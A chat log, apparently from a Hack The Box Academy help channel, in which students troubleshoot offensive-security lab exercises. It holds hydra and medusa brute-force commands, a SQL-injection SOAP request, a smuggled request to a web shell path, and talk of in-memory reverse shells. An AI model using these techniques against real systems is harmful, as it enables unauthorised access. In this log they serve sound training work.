#modules

so I have a txt file filled with various hashes, and I need hashcat to scan all the algos not just one type

from what i know, i dont think you can specify multiple hashing algorithms from a text file

all hashes in the file must be from the same algorithm

Oh so the file that I got from HTB would be all one algo then?

what module, what section?

Week 6, Cracking Passwords with Hashcat, Skills Assesment Hashcat last question

yes, all password hashes in that file are from the same algorithm

ahh I see makes more sense now

Hello, how i can answer on questions without pwnbox?

use ur own VM and connect using the OVPN file

what would be the input needed for me to grep the most common password? after I crack all the passwords in a file

Okay

going through the content I see Eternal blue (ms17-010) is still in the material how likely is it to ever be seen in an engagement? or is it largely used by trainers because it is so easy to replicate? just curiosity

u can either use a python or bash script to give u the count of each word/password

it would be like 3-5 lines thats it

try to do the module that way. it won't work. why are you giving bad advice?

from the documentation

from the module

@autumn pilot tell me you haven't done the module w/o telling me you haven't done the module

hes not giving bad advice, you need to understand that the shellcode ur replacing in the msfvenom payload is what will get executed, so technically it doesnt matter the port number u specify

because as i said, the way it's written it dont work

DUDE, you are about to be surprised lol

lol am i

so are you.

i know why bishop fox dont use htb as a training platform anymore and makes their ctf in house now. the same ppl who author sliver

let's rap. why does the module have instructions which are not aligned with the official documentation?

💀

arent you noticing any difference in the two msfvenom commands?

No wonder you leave the server now and then.

i only come here to bring issues to attention

but it seems like when i do i get these responses like it doesn't matter? we dont care?

also, im not gonna wait lemme surprise u from now, you might want to take a look at the author's name 😉

is his name joe?

aka moloch

try to joke, i will report idc 😄

report for?

anyway, let's keep the topic and try to help u here

well i am doing that module to talk about with a guy named joe later on when i'm done

i come here to tell you about the documentation vs the module and u wanna act like this. idc

Just a small port difference.

bro it doesnt matter

which one can change by themselves.

read this

the C# format used in the module, will produce an asp code, which later u will replace, so whatever port u use there, it doesnt matter

..

not according to the official documentation

💀

why when i try with that other port it doesn't work?

as soon as i change to the documentation? works

scenario in the documentation is slightly different from the one in the module as i remember

maybe u had another thing wrong back then who knows

¯_(ツ)_/¯

ya maybe idk

i thought i was being helpful but i guess i'm just too noob

tell me you didn't see the module author without telling me you didn't see it

no one said that, we are trying to help you, but ur being aggressive and saracastic, what can we do? 😄

good the module author can read it themselves

He wrote it

doesn't need to read it again.

the module dont work out of the box

¯_(ツ)_/¯

maybe it was just broken the first time and changing the ports was useless but it seemed to fix the problem for me when i did it.

That's where you learn.

it ain't THM buddy that gonna spoon feed you.

yeah, if only i had enough modules done in the academy and on there to make comparisons i could try harder and learn more better, right

why so mad?, enjoy the learning buddy.

i am ty. the academy is so good 🙂

🏆

for best humour. ragebait

report any issues with modules in #1234357888114364508

how long to fill the bubbles

Keep going. you got this.

What wifi adapter do you recommend that support monitor mode and packet injection?

maybe better asked in #hardware-iot-ics

I am working on "Firewall and IDS/IPS Evasion - Medium Lab" my though process is leading towards spoofing an IP on the same subnet but that has not worked. I've tried multiple other methods of bypassing the firewall filter and some out of the box techniques and nothing. Any thoughts or ideas would be appreciated. Thank you.

what i see suggested often for the Medium and Hard labs is to use Pwnbox

ah

Need help with an example for Information technology foundations - Linux fundamentals - regular expressions. No module just using the practice regex exercises. Exercise is search for all lines that contain a word that starts with permit. (From /etc/ssh/sshd_config file)

Er Mah Gurd I've been banging my face against the keyboard this long and that's why it wasn't working?!!!! AAAHHH I even set a route on my Kali box and it didn't work but I think it was the wrong mask. Either way, thanks so much!

Hey guys i have a little question, im doing the password craking module and know im at the pas the tikcet onllinux section, i want to know like the system of using mimikatz etc to have acces to certain shares is pretty easy, but what i want to know is when the importating of the ticket is ok and we navigate like the command dir \DC02.inblanefreight.htb\c$ how do we know that its DC02 or DC01 or idk LINUX01? Is it like the workstation name??

Its dns record? You've got a lot in there about mimikats and passwords, but you're asking about the host in a domain?

real stupid question: there's an intro to C# module, but what for? i've never seen anything about C# being useful in infosec

custom tool creation

windows evasion too

C# is highly used for windows exploit development

ah ok yeah that makes sense

Machine has being spawning for almost 10 min. Are we having issues?

this is the AD Attack module.

ctrl+shift+r and try again

Thanks, let me try ...

I am on a Mac. That just put everything in "reading" mode.

But I did refresh the page anyway.

And still the same...

try hard refreshing instead

how

logoff?

from HTB?

seems it something with that section. I clicked next and the server spawned fine. I clicked back. Then the spawning thing is available. Clicked to start the victim but same , again...

Try starting another machine

Yeah, just did

it worked on next section.

let me do that again

Seems to be working now, finally ...

it was a browser issue

anyone on that can help with previous question?

chatgpt is great for stuff like that

I tried it but gave me grep command and one for awk

so tell it not to use those if you don't want it to

Hi

Just wanted to know someone else command would look like. If they were asked the same question. Because there was no way I could have answered it without gpt

what's wrong with awk/sed

Nothing. That’s what the previous lesson was about and using regex to find the answer. So I used grep and awk with no success on my knowledge then used gpt to find the answer but I was confused how it came up with that answer.

you can ask it to break the command down

it really good with that stuff

Oh ok I did not know that. Let me try that out.

What operating systems do you people use? Or it’s just vm

VM running whatever. i have a Parrot and Windows 10 VM

I use parrot os but as a solid operator with windows dual boot, it’s hard to find guides or mentors on how to hack or do much since parrot os is new

it shouldn't really matter which distro you use because in the end, you're running Linux

the most popular distros people use for pentesting are Kali, Parrot, and Arch

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

you can have a look at this article to get an idea of where to start

I tried Kali but I’m not big on like hacking others and stuff I been learning mostly on defense and finding ways how to use it efficiently, parrot os comes with a lot of applications but hard to find guides on how to use it on the other hand Kali Linux been around for years and has about anything you need to find

Hey guys, im doing the Pivoting, Tunneling and Port Forwarding skills assessment, i did everything A-OK to the moment till the last machine, here's my advances and finally the problem:

||I used the webshell given to obtain user-access to the first machine, opened a socks5 server using ssh, SSH'd straight to second box using creds found in the first machine.
In the second machine, while using SSH, I opened a second socks5 server and used RDP to connect to the third machine.
In the third machine i had to do a ping sweep to find the last machine, the Domain Controller, I'm supposed to use the same credentials that i found in the last machine I think, maybe not, but either way it doesn't matters since I cannot even connect to the DC, the firewall seems to be blocking the connection and I dunno why.
I would use another machine to see if it does allow me to connect from that machine IF there was another one, there isn't.
I used nmap to see if maybe the DC RDP service was listening on a different port and then the SMB ports came open, that gave me the idea of using that service to get the last flag and it worked flawlessly, now I'm wondering: Was I supposed to complete it that way or did I cheat somehow? I wanna complete it the right way since the idea here is to learn and apply what I've learnt so far.||

Getting the flag is getting the flag if you used code then it shouldn’t be considered cheating it’s unfair if you use gpt or something that generates the code for you

if you're using Linux for defense then maybe look into something like SANS SIFT Workstation or Remnux

Im just trying to learn how to better defenses and if something snags a trap can hunt it down you know, not trying to be a fbi or cia hacker just want to dedicate to stopping people from doing something

then you should probably look at HTB CDSA

https://academy.hackthebox.com/preview/certifications/htb-certified-defensive-security-analyst

How do I get Medusa to switch ports? This exercise I'm on requires me to gain ssh credentials by attacking FTP however I can't obtain the username and password because ftp on this exercise runs through a port other than 21

EThical Hacking 1 > Week 6 > Attacking Commmon Services > Attacking FTP

It's windows, there are many ways to get a flag on it, I used rdp when I did it. If you were able to reach the last machine I'd say you successfully pivoted.

how did you manage to bypass the firewall?

thats what i cant figure out

this cert focuses on SOC analyst processes, including detection and threat hunting. you can choose whether to do the exam or not, but the content is good regardless

well first of all you're using RDP

Hey everyone! I’m new to HTB and I was wondering if I should learn Linux fundamentals before the introduction to networking module?

both are a good start, pick which one sounds cooler to you

The port is open, you just connect to it like you did over smb ...?

i don't get it, the last windows machine and DC dont have SSH service running so thats the way i could get access to it

yup

Windows doesn't typically use SSH for remote management

that would be what WinRM is for

the DC blocks the connection as if it the port was closed

thats because the machine you're trying to reach it from is not part of the remote computers group

got no more machines to jump to

it can't RDP because its not in the list of computers that can 🙂

doesn't mean you can't talk to the DC over another port/protocol

alright, thx a lot

that clarified my question

stills im confused, how did you manage to RDP to it?

Oups was looking at wrong flag, I used smb >.<'

aightt, so i guess its all ok

thanks yall, really thanks a lot

https://tenor.com/view/torgal-clive-rosfield-clive-pet-clive-torgal-gif-15820630843362730998

been banging my head over that for a while but i guess i did it then

what is wrong with pwnbox

its been 2 days

there is already me procrastinating, now this.

nothing? https://status.hackthebox.com/

.

change the server

did anyone else have problems with the sliver c2 module where generate stager hangs?

when i had check ps -aux, it shows it was generating with msfvenom and ruby so i had fixed the bundler and i'm able to generate with msfvenom now which would indicate it was the metasploit install, after fixing that its still hanging i also had checked google which led to an issue back in march that was fixed on this however, it appears that i'm still having that issue. wondering if anyone resolved this issue

or even encountered it

-n , its in the help page

Hey

well if anyone runs into the same trouble i had with that module you have to use binaries and generate it from the server part not the client

it's module of Nmap Scripting Engine and I'm somewhere stuck at following question.
Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer.

I use NSE scripts on port 80 and 31337. Both are webserver running on host but didn't find any flag.

look at the result of scans u got, and then examine them, you wont get the flag directly

delete it to avoid spoilers pls 😅

and yes thats not the correct flag for the NSE section, search somewhere else

Can you please help which port should I focused on?

i will tell u in DM to not spoil others

ok. Will DM you.

Hey im atuck on windows priv esc vulnerable services section im at a point where i have downloaded a shell.ps1 script to get a reverse shell into yhe target windows system following steps mentioned in this section but i cant find the shell.ps1 script to run it now

wym cant find the script

Ah

There was a druva inSync exploit in the target windows vm that i modiefied to download shell.ps1 which was in my attacker pwnbox

I executed druva.ps1 and that shell.ps1 got downloaded into the target windows but i dont see it anywhere to execute it

its executed in memory

Also it says execute the poc script on target host seting up a netcat listener on our pwn box

After modifying powershell execution policy with a command set exevution policy bypass scope process

I try to run that command but gets an error

?

I'm trying to do the Nessus Skills Assessment, but keep getting the same error even respawning the target multiple times. Am I missing something?

try unrestricted

hello whare is the open button in fatty-client in [ Exploiting Web Vulnerabilities in Thick-Client Applications ]

what error?

I could also use some help with understanding: nmap smtp-user-enum where in examples I follow that use nmap --script smtp-user-enum -M VRFY -U <path-to-list> I get an error with: Argument to -M must be at least 1!

in the screenshot, it just won't allow me to connect and says theres nothing i can do about it lol

as I am trying to complete the footprinting module without using Metasploit

@wicked solstice did you click advanced and continue?

i did

let me try again i just closed it out

oh lmao i had to scroll down some more to see continue

hello whare is the open button in fatty-client in [ Exploiting Web Vulnerabilities in Thick-Client Applications ]

ubuntu@WEB01:~$ ./chisel server -v -p 1234 --socks5
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.32' not found (required by ./chisel) ./chisel: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34' not found (required by ./chisel)

I get this error on Ubuntu pivot host I can't fix it I need help

Hey guys, I'm fairly stuck on the Web Service & API Attacks - Skills Assessment. I looked around here to check what other members have found out but I can't get the server to properly answer me, my PoC look like what's below but as stated in the exam "Without the proper payload it'll hang or throw an error" which prevent me from using burpsuite intruder or ffuf or SQLMap to try to get a payload to work, is there any other way ? I also tried to use the python script that's been given in the courses (client_soapaction_spoofing.py) and tweaking it a little bit but it's the same problem, could anyone guide me on that ?

||```HTTP
POST /wsdl HTTP/1.1
Host: 10.129.241.201:3002
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
SOAPAction: Login
Content-Length: 512

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:tns="http://tempuri.org/"
xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/">
soap:Body
<tns:LoginRequest xmlns="http://tempuri.org/">
<username>
SELECT++FROM+users
</username>
<password>
SELECT++FROM+users</password>
</tns:LoginRequest>
</soap:Body>
</soap:Envelope>

hello whare is the open button in fatty-client in [ Exploiting Web Vulnerabilities in Thick-Client Applications ]

#modules

Hi

Everyone

#modules hi everyone

hello @jaunty depot

You can DM

Hey

I still dont understand nop sled

I'm gonna ...

Hello - I am somewhat new to htb. I'm wondering if there are any Academy modules that are more focused on SCADA/PLCs? I know it's discussed in some of the Networking modules, wondering if there is something where the bulk content is centered around Industrial testing/security?

There is a new pro labs that is centered around ICS. I don't think there are any related modules in the academy yet.

Hello, I am working on Attacking Common Services > Attacking FTP
I have answered the first question about the port on which ftp is running, and to answer the second I used hydra (I have just finished the password attacks module so I'm comfortable with it) to brute force the login and passwords using the provided lists. Here's the full command :

hydra -L ../resources/users.list -P ../resources/pws.list ftp://10.129.203.6:2121 -t 16 -o hydra_results.txt
And it found only one pair of credentials : j****n:3****h. Discord told me that the expected username was r****n even though I didn't find any matching password for that username.
Now I'm running hydra with only username r****n and yet no result. How can I find the associated password?

can you link us to the section? i think i might've done that one

@dvr ^

@fading olive ^ ^

where did you obtain the users.list and passwords.list?

From the resources tab of the module Attacking Common Services

https://academy.hackthebox.com/module/116/section/1165

FTP stands for file transfer protocol. who knows what files are in that server.

hey seems like i didnt do that one yet, sorry cant be more help

I tried accessing the server, I ran nmap with the ftp-anon script but it didn't yield anything, and when I try to connect using the credentials I found it says "connection refused", whenever I run :

ftp -p ip_address port
It says connection refused

ftp user@ip ?

It says Name or service not known

ftp://10.129.203.6:2121 this is your known ip?

I've restarted my vpn and reset the machine several times but it keeps erroring

You might wanna take a look online about FTP anonymous login. You have used the wrong login format.

er... your known ftp server?

hi! im was reading the Types of Databases section of the SQL Injection fundamentals module and it says "NoSQL injections will be covered in a later module."

What module is it? Is it even included in the CPTS exam?

I restarted since but it was yes

Okay I've done it already but I may have missed something

yes please because I don't see what's wrong with my commands

quick sanity check, if someone wouldnt mind... when viewing HTTP traffic on a webserver from inside the network, we would never see its LAN address in the host header right? we /should/ see its public facing IP?

my assumption leads me to believe this though admittedly ive never done this kinda traffic analysis before to know whether thats the case...

and the module info has me questioning myself

What going on guys

😋

Yes, you're correct. When you're inside a network and monitoring HTTP traffic, the Host header typically reflects what the client is requesting. The Host header would show the public-facing IP address or domain name of the webserver.

However, for internal clients accessing the webserver directly within the LAN, it depends on how the request is made

If the internal client accesses the webserver using its LAN address, the Host header might show the internal IP (e.g., 192.168.x.x).

oh right.

If the internal client uses the server’s public IP or domain name, then the Host header will reflect the public-facing IP or domain name, as it would for external clients.

if you want to verify that

Hello, sorry to disturb you that's my first time here , and my first time asking help for hbt. i'm following the 'basic toolset' path, and actually am on the Login Brute Forcing module. But i'm blocked a question that i don't know at all how to resolve can you help me pls :(

Internal request: If a client within the same LAN accesses the webserver using the server's private (LAN) IP address, the Host header in the HTTP request will reflect that private IP (e.g., Host: x.x.x.x).
External request: If a client is accessing the webserver via its public-facing domain or IP, whether internally or externally, the Host header will reflect that (e.g., Host: example.com or Host: x.x.x.x).

the section describes attackers using 127.0.0.1 and/or admin as a header to get access not normally accessible... im failing to see what they're talking about.... any idea? dir listing/enum type stuff? failing to see how that could be ultimate useful in some big or small way.

sorry i have lost my god power i don't know from which module you are asking and whats the question is?

Its not a question, just a small tidbit of info that mentions a method of attack but not what its useful for.

Its located here:
https://academy.hackthebox.com/module/229/section/2464

not you bro

but let me check

the module is "login brute forcing" and the question is : What was the password for the ftpuser?

@somber fiber here's the screens

😭

ah, no biggie.

but let me check

there is way to bruteforce ftp login

try that it might help you

plead to the google god.

i'm trying

as its running in local env. admin must have set as DNS without any ".com,.htb" which will refer there.

will i get cubes from completing t2 modules after purchasing student plan?

Yes

alr thanks

hydra and medusa don't work :(

https://help.hackthebox.com/en/articles/5272936-introduction-to-htb-academy#h_6ac6f773e1

Click the link above, it’ll show how much you get back per tier 😄

Makes you able to save for a higher tier module

y thats what i wanted to know, i thought you could only do tier 2

You can do up to tier 2 modules, without using cubes, if you want a tier3 module, you will have to use the cubes you earned by doing the other modules

I'm doing the traffic analysis section: https://academy.hackthebox.com/module/229/section/2464

and on HTTP 400s (smuggling) and im wondering if this were real world, and the server was vuln to smuggling, we should see the smuggle:

 (decoded):

GET /login.php?id=1 HTTP/1.1
Host: 192.168.10.5

GET /uploads/cmd2.php HTTP/1.1
Host: 127.0.0.1:8080

 HTTP/1.1

first as a 400, then a 200 for each request right? Im not seeing that in the wireshark traffic

I do see GETs for /login.php... but i do not see a log for the /uploads/... request, either as its own log entry or as a secondary request nested in the /login.php ... the info im reading on http req smuggling suggests that the request should in fact be listed as a 200 somewhere

Please drop the command you are running and what output/error you are getting.

[eu-academy-5]─[10.10.15.31]─[htb-ac-1201594@htb-i22f36prnr]─[~]
└──╼ [★]$ medusa -h 94.237.57.90 -u ftpuser -P /opt/useful/seclists/Passwords/2020-200_most_used_passwords.txt -M ftp -t 5
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks jmk@foofus.net

NOTICE: ftp.mod: failed to connect, port 21 was not open on 94.237.57.90
NOTICE: ftp.mod: failed to connect, port 21 was not open on 94.237.57.90
NOTICE: ftp.mod: failed to connect, port 21 was not open on 94.237.57.90
NOTICE: ftp.mod: failed to connect, port 21 was not open on 94.237.57.90
NOTICE: ftp.mod: failed to connect, port 21 was not open on 94.237.57.90

are you using pwnbox or your own vm?

pwnbox

i tried with my kali but same thing

and the question is : What was the password for the ftpuser? i already look 10 times the explciation on the page no password ...

Perhaps the service is not running on the default port

have you ran the nmap

?

yeah here is it

ORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
25/tcp filtered smtp
111/tcp open rpcbind 2-4 (RPC #100000)
50006/tcp open http nginx 1.26.1

there is no ftp

there is no ftp

yeah so why this question :')

same pinch

have you tried cracking the ssh

or with rpcbind

Use the provided port in the target when you spawned it

ssh yes but not rpcbind

got nothing in ssh?

medusa -h 94.237.57.90 -u sshuser -P /opt/useful/seclists/Passwords/2020-200_most_used_passwords.txt -M ssh -t 5
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks jmk@foofus.net

ERROR: No supported authentication methods located.
ACCOUNT CHECK: [ssh] Host: 94.237.57.90 (1 of 1, 0 complete) User: sshuser (1 of 1, 0 complete) Password: picture1 (1 of 197 complete)
ERROR: No supported authentication methods located.
ACCOUNT CHECK: [ssh] Host: 94.237.57.90 (1 of 1, 0 complete) User: sshuser (1 of 1, 0 complete) Password: 123456 (2 of 197 complete)
ERROR: No supported authentication methods located.
ACCOUNT CHECK: [ssh] Host: 94.237.57.90 (1 of 1, 0 complete) User: sshuser (1 of 1, 0 complete) Password: 12345678 (3 of 197 complete)
ERROR: No supported authentication methods located.
ACCOUNT CHECK: [ssh] Host: 94.237.57.90 (1 of 1, 0 complete) User: sshuser (1 of 1, 0 complete) Password: 123456789 (4 of 197 complete)
ERROR: No supported authentication methods located.
ACCOUNT CHECK: [ssh] Host: 94.237.57.90 (1 of 1, 0 complete) User: sshuser (1 of 1, 0 complete) Password: password (5 of 197 complete)

i dont think io have to do that BUTT the next question is "After successfully brute-forcing the ssh session, and then logging into the ftp server on the target, what is the full flag found within flag.txt?"

to crach the ftp ?

maybe the ftpuser exists but no ftp service is running on the box: ie just crack the pass?

i can't do it without write a user

i got it i guess

this module must be related to web ftp

so in the nmap i have the port 50006 http, but i have only a page with : Welcome to inlanefreight.htb

There is a typo in one of the recent modules. The switch to specific the application is -a and not -n

try dirsearch

?

and vhost enum (dunno if dirsearch does that or not)

boxes often use vhosts

right

insted of url try this ftp://IP

in browse

literaly like that : ftp://94.237.57.90 ?

yes

does'n work, taht gives me a google page

This is a public IP address (Docker container). A port has been defined in the target. Only this one port is relevant for you

add port

i got the binary fuzzing module to talk about with my fuzzing friends

if anyone wanna do it with me later hmu

wich one ? 50006

https://tenor.com/view/foxy-fnaf-five-nights-at-freddys-freddy-fazbear-reddit-gold-gif-19334463

first try then ask

and yes

The port specified under Target.
IP:PORT

bro shooting gun from our shoulders.

Im doing the AEN and I run the proxychains GetUsersSPNS.py but after i run it says connection time out. Some help please.

I will try

Have you tried syncing your clock with the dc?

The AEN module is structured like a walkthrough. Have a look at the module to see how to proceed.

i will try it

I know but there is nothing to help with this issue

Now i cannot set up the correct time the clock scew is too great

then sync ur clock w the dc

use ntpdate

im getting no eligible servers

u sure thats the DC ur syncing w ?

the dc is x.x.x.3?

yes

im trying ntpdate IP but no eligible servers

weird, try resetting, i dont remember any problems with the DC in that module

could be connected with my proxychains conf?

ur reaching the DC via proxychains anyway right?

so when u use ntpdate, im assuming ur adding proxychains before the command, right?

yup

u are, right?

[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
ntpdig: no eligible servers```

yes

weird tbh, tried restting?

didnt want to but gonna reset

Proxychains4 does not support UDP https://www.kali.org/tools/proxychains-ng/

can someone give me code for a microsoft fishing website

huh? 🙂

phishing

u want a phishing website? 🙂

its for school

i doubt we can help with that here :/

why

cuz no one knows what you will do with that website, also le'ts stop talking in this channel and keep it related to Academy modules

what channel would i talk in

read #welcome, and come general 😄

i dont have permission to use it

You can only read there to see how you can verify your user

I tried using tsocks but didnt work

is there any way to gain the cubes for free?

Until all module content is updated, I strongly recommend adding alias crackmapexec='nxc' to your .bashrc file. Will make the process of going through the modules that much easier.

Just type nxc lol

stop copy paste , write the command yourself

y tho? i do everything through pwnbox on my phone. (/s)

more hollywood that way

in the sql injection fundamentals module.. in the SQL Operators section....i did this module maybe 2 years ago and i cannot get the right answer. there is only XXX rows in the titles table, and the answer i inputed long ago has 6 digits. can someone confirm that the answer has either 3 or 6 digits? in private if its too much spoilers

Yes, it is 3 digits. You have the right answer which you may want to consider censoring or whacking.

here's why im asking:

wrong answer:

i thought i was crazy.

Yeah that happens when they update a module, all your answers get really messed up.

delete thats please, it have an answer 😄

a wrong answer

oh

wait lemme read the whole thing

at this point it can act as a troll 😆

It does make it difficult to go back through and figure out what content you need to go through again.

they updated the module i assume

im glad its only the sql injection module ive mastered that already for my oscp exam 😆

still going to go through the module though

how do we restart these VMs?

theres a button right next the ip address

Why cant i talk in general 😦

I don't have that

I can only spawn or terminate

Then it doesnt require a box

read #welcome

if you click terminate, and then click on spawn, you will effectively restart the VM

alright

it will generate another IP too

MSSQL, Exchange, and SCCM Attacks
Section: Skills Assessment
What is the format for question 2? is it Domain\Account?

first.last

can I DM really quickly?

sure

this is saying the correct answers wrong

nvm

read the question

guys, I am stuck at forever spawning a target. I already logged off and log in again, but no changes.

what module?

AD Enum / LOTL

lemme try myself

it worked,

i suggest trying to change the VPN server ur using

you're right, thank you very much

hope it worked

#modules I am working on module 19, section 119, Network Enumeration With Nmap.
Firewall and IDS/IPS Evasion - Hard Lab.

The question is this: 'Now our client wants to know if it is possible to find out the version of the running services. Identify the version of the service our client was talking about and submit the flag as the answer.'
Has anyone done this already? I'm stuck here and can't move forward. I've tried everything I know. Could you kindly point me in the right direction? 😟

sorry, not sure if this is the right channel as i don't need help with a module but just had a question with something i read on one. "To be able to track how our sent packets are handled, we deactivate the ICMP echo requests (-Pn), DNS resolution (-n), and ARP ping scan (--disable-arp-ping) again." why do i need to disable icmp, dns and arp to track sent packets?

yep, took a few minutes but finally spawned, cheers

Week6 Ethical Hacking 1 > Attacking Common Services > Attacking SMB

I am on the last question that requires you to SSH into the target but I continually run into this issue where I do not get a chance to enter the password and am instead kicked out because I have a "publickey"

This is the only module I run into this issue on, every other module let's me enter a password when I clarify a user

let's say if our target host was only responding to queries made from certain protocols which protocol would you think that be?

is HTB academy a good way in getting into cybersecurity & pentesting?

it depends on you. If your aim is to actually bang your head against a wall saying to yourself "why did I not think of this earlier?" then definitely.

but yes it's a good platform

.\

It's perhaps a good way of learning and practicing the technical side of it security which can help you get into it... probably a lot of other factors weigh more heavily on whether or not you reach the end result that you want.

It'll definitely acclimate you to the frustrations as KahnMarshal puts it so eloquently.... or swiftly usher you toward a different carrier path.

hey you can't blame me I just completed pass attacks module

I'm preparing him for what's waiting for him

I want to see if once I learn the basics more or less it will be as I expect it to be, possibly make a future out of it haha

We've all been there. Hours-wasted-on-a-typo sort of day lol

Sounds like you're in the right place then.

I am used to the frustations, how much I'd will to quit I'll still stick to it one way or another

start with the information security path

Mind if share a screenshot?

you have no idea how much I hated the pivoting module hehe

You don't need to give it a port btw.

that's just an old habit

Oh

@shell ore you done this module?

what module?

oh yeah, 1 second

lemme see the problem

screenshot?

@sacred jacinthThe most likely protocol for the service in question is HTTP. I found the version, but this doesn't help me find the flag

just saw ur message

ok so u access the share right?

since ur stuck on the last question, i assume u got his password right?

yes, obtained everything, it's just the ssh thing is stopping me

the error ur getting in ssh, means that the authentication method allowed is only via private and public keys, passwords arent allowed

if our target host had an associated URL/FQDN and we wanted to resolve it which protocol would that be? and that protocol should have a port what if we mimic the request as that protocol?

lemme try smth rq, to see if i remember the module correctly, 1 sec

ok, it doesn't look like the rest of the module covers keys tho

ok so, have u tried connecting to the SMB service?

smbclient or smbwalk?

i remember there was quite talking abt ssh keys somewhere in the module or previous ones

normal smbclient

see what shares there are, what info on them

I think you confusing smb with snmp

lemme go see rq, I've been working on this problem for days now so my memory is a little hazy on how I got where I got

i thought the same, but then i was like: maybe there is smth called smbwalk whatever

its okay, stay relaxed and recheck ur stuff

sweats profusely

got this

don't post screenshots

connect and see what u can do

trying not to

i dont beleive there are any spoilers there so its okay 😅

but if u prefer, then delete it, better safe than sorry i guess

mr goblin gets angry but idk

ahaa

can we DM?

sure

Hi, when I attempt to discover the nameservers of the infreightlane.htb domain in DNS Zone Transfers module of the Information Gathering Web Edition in the penetration tester job path I get nothing back from the dig command that I could leverage to execute zone transfer. I'm using pwnbox.

@shell ore next time SMB into SSH to get the cerds.

well the secondary dns that you are trying to zone transfer to is perhaps not supposed to return anything? how about you try a different secondary dns?

I need help with the "login bruteforcing" module I am on the "Login Forms" section and am using this exact command to bruteforce the login but its not working. hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt -f 83.136.254.47 -s 55886 http-post-form "/:username=^USER^&password=^PASS^:F=Invalid credentials". Please tell me what I am doing wrong I don't understand at this point.

Got an issue with XSS session hijacking. I can get a response from the site but the cookie value is empty for the admin. I have tested this on my own side and it returns my cookie value. I have tried generating a cookie by supplying the login url to the admin before the xss payload. Any ideas on the issue? Thanks

I'm not sure what I'm doing wrong. No command is showing me any nameservers for me to leverage into zone transfer. I can send the commands over if that would help.

Do I have to pay inorder to practice HTB?

send me the commands

Need to see the payload

if im using a VPN file to connect my own VM to thw HTB VPN do i need to grab a new file everytiime i want to connect? i was able to connect just fine the first time yesterday but now im trying again and it doesnt appear to be working

Only if you change regions

HTB Labs? Not all machines. Only for the retired.

im running the vpn and im getting the "Initialization Sequence Completed" but it seems likt it keeps trying to reconnect? i dont recall the first time the console i was connecting to constally logging stuff

Can you connect to machines?

@sacred jacinth I give up, I’ve spent two days on this exercise and I can’t solve it. Thank you for the help.

get in my dms

like with pwnbox? yeah can connect just fine and ping/nmap my target ip just fine as well

I am having issues with Footprinting lab medium. I believe I need to access MSSQL using the Microsoft SQL Server Management Studio. When I try to authenticate I get the following error:

TITLE: Connect to Server
------------------------------

Cannot connect to WINMEDIUM.

------------------------------
ADDITIONAL INFORMATION:

A connection was successfully established with the server, but then an error occurred during the login process. (provider: Shared Memory Provider, error: 0 - No process is on the other end of the pipe.) (Microsoft SQL Server, Error: 233)

For help, click: https://docs.microsoft.com/sql/relational-databases/errors-events/mssqlserver-233-database-engine-error

------------------------------

No process is on the other end of the pipe

------------------------------
BUTTONS:

OK
------------------------------

Am I doing something wrong or is there an issue with the lab?

With your own vm

Is this from rdp?

Yes

with my own vm when i attempt nmap <targetip> it just says host seems down

-Pn

Maybe try those creds on another user

Will do, thanks.

Thanks, yea I saw that. I just don't have the VIP access so trying to exhaust what I have access in HTB-A for the time. Thanks again.

Also FYI prolabs is not included in the VIP access. Its a separate sub.

I need help with the "login bruteforcing" module I am on the "Login Forms" section and am using this exact command to bruteforce the login but its not working. hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt -f 83.136.254.47 -s 55886 http-post-form "/:username=^USER^&password=^PASS^:F=Invalid credentials". Please tell me what I am doing wrong I don't understand at this point. This is the form I am bruteforcing ```
<form method="POST">
<h2>Login</h2>
<label for="username">Username:</label>
<input type="text" id="username" name="username">
<label for="password">Password:</label>
<input type="password" id="password" name="password">
<input type="submit" value="Login">

        <p class="error">Invalid credentials</p>

</form>```

hello guys

any good samaritan who can throw me some light on Nibbles - Privilege Escalation module?

monitor.sh does not work as intended once I modify it to open a reverse shell on my attacker machine with root privileges

You need to specify the full path

it keeps asking to introduce a password which shouldn't be the case as the file can be run with root privileges

Specify the full path

DAMMM!!!

thank you very much

what is the reason for that?, I am already located on the directory where the file is

you could make another file called monitor.sh, it's not the same as the one specified in sudo -l

got ya

thx

Hey everyone
Sorry this is random

I’m looking for a team for the hack the boo practice and competition

But I can’t find any here
I wanted to post it on the general channel, but it kept directing me here

so we can connect to smb/ftp using smbclient and ftp, and once there we can view files and retrieve them. but on the actualy target machine where are the files used for smb and ftp being stored?

Please i need team members for the CTF boo competition

create a post in #1225791307256168448

Okay thanks 😊

Have to be on the machine to find that out

Usually just a folder

while going through modules when on machines for exploration purposes is it good to look to see if you can get to root? more just for POC and to test yourself?

not particularly, this is better for boxes. (after finding root you try a diff way to get root, or user w/e). to my understanding most academy boxes are set up to do just the lab involved and have been hardened to other attacks, taking over the machine would be a liability on the network

hmmm... fair enough, I found a really easy root using a sudo -l so it was just exploring but fair enough, I know there are ROE when doing actual testing I just thought it was cool to string things together

Need help on Local File Inclusion SA

I am at the end nearly, the only problem being cant access my payload altough read the source code

mind linking so i can confirm its the one ive done? i think i have a nudge for you

https://academy.hackthebox.com/module/136/section/1310

this is "normal" just up arrow and reconnect.

yeah ive done this one wanna DM me where you're at and what you've tried so far?

Sure

